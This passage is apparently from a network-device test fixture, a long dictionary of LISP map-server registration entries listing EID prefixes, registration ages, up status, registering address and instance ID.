"2c57.41ff.5e28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5e68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5f87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5fa7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5fc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5fe7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5f08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6087/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.60a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.60e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6008/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6028/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6048/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.61a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.61c7/48": {
"last_register": "2d17h",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.61e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6168/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6287/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.62a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.62e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6208/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6248/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.63a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.63e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6308/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6328/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6348/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6368/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6487/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.64a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.64c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.64e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6428/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6448/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6468/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6587/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.65a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6528/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6548/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6568/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.66a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.66c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.66e7/48": {
"last_register": "2w0d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6668/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.67a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.67c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.67e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6728/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6887/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.68c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.68e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6808/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.69c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6948/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6968/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6ac7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6a48/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6a68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6bc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6b08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6b48/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6dc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6d48/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.76e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.7987/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.79e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.7908/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.7ac7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.7a68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.7b87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.8068/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.8168/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.8708/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.8768/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.ef69/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f029/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f069/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f1c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f249/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f269/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f3c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f3e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f4a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f529/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f549/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f569/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f688/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f6a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f649/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f7a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f7e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f729/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.f749/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.0469/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.05e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1109/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1288/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1269/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1388/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.13e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1309/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1369/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1488/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1469/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1588/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1629/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.17a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.17c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.18c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1988/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.19c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1aa8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1a49/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1bc8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1be8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.46e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4c88/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5309/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6e09/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.8688/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.87a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.ab4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.bc4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.bd89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.bda9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.bdc9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.bd2a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.be89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.bea9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.02a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.0ac9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.156a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.192a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.194a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.196a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1ac9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1ae9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1ba9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1b0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1e2a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1e4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1e6a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1fc9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1fe9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1f2a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1f4a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2089/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.20e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.200a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.202a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.204a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.206a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.21a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.21c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.21e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.210a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.212a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.214a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2289/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.22a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.22c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.22e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.220a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.222a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.224a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.226a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2389/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.23a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.23c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.23e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.230a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.232a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.234a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.236a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2489/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.24a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.24c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.24e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.240a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.244a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.246a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.25a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.25e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.250a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.252a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.256a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2689/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.26a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.26c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.26e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.260a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.262a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.266a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2789/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.27a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.27c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.27e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.270a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.272a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.274a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.276a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.28a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.28c9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.28e9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.280a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.282a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.284a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.286a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.2989/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.29a9/48": {
